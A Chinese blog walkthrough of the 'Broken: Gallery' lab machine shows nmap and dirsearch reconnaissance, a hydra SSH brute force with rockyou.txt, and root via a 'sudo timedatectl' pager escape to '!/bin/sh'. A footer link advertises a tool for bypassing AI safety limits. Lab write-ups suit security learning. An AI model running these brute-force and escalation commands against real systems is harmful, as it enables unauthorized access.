Broken: Gallery靶机复现

CcHKer2024-08-18 16:34

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
fiveym31 分钟前
二层核心网络技术通俗解析(VLAN/Access/Trunk/LACP/ARP)
服务器·网络·网络协议
草木深雨纷纷1 小时前
mt管理器手机版下载2026最新版更新下载分享
linux·运维·网络·智能手机
lifejump1 小时前
Dede(织梦)CMS渗透测试(all)
前端·网络·安全·web安全
SEO_juper1 小时前
谷歌本地 GEO 权重拆解,全域 SEO 落地实操
大数据·网络·ai·seo·跨境电商·geo·跨境电商独立站
BY组态1 小时前
Ricon组态系统实战:从0到1搭建工业监控平台
网络·物联网·iot·web组态·组态
专注VB编程开发20年1 小时前
Vscode调试是真不方便
网络·网络协议
Yang96112 小时前
鼎讯 CM-K60 光缆普查仪:铁路高速光缆识别利器
网络
Qt程序员2 小时前
突破I/O天花板:Linux零拷贝技术
网络·linux内核·io·linq·零拷贝·mmap
HackTwoHub2 小时前
AI提示词注入绕过工具:一键绕过Codex/Claude安全限制,CTF夺旗与渗透测试必备神器
网络·人工智能·安全·web安全·系统安全·网络攻击模型·安全架构
sensen_kiss3 小时前
CAN302 Technologies for E-Commerce 电子商务技术 Pt.8 网络安全(Secure the Web)
网络·学习·安全·web安全
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【AI】2026 年具身智能模型和世界模型总结05零基础教你claude code 接入 deepseek V406AI科技热点日报 | 2026年5月11日07codex app每次打开重连5次Reconnecting问题解决08Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)09人工智能最新动态 AI 日报 · 2026年5月10日10Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓